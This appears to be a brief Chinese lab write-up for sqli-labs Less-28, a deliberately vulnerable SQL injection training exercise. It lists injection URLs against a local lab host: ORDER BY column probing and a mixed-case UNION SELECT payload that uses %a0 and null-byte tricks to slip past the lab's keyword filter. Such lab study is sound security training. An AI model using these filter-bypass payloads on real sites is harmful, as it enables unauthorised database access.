【sqli-labs】 less28 GET- Error based -All you Union&Select Belong to us -String -Single quote with parenthesis(GET型基于错误的去除了Union和Select的单引号带括号字符串型注入)
这个不是基于错误的吧,看源码可以知道错误并没有输出
那就使用;%00和order by试一下
http://192.168.136.128/sqli-labs-master/Less-28/?id=1')%a0order%a0by%a03;%00
http://192.168.136.128/sqli-labs-master/Less-28/?id=1')%a0order%a0by%a04;%00
http://192.168.136.128/sqli-labs-master/Less-28/?id=0')%a0uNion%a0sElect%a01,2,('3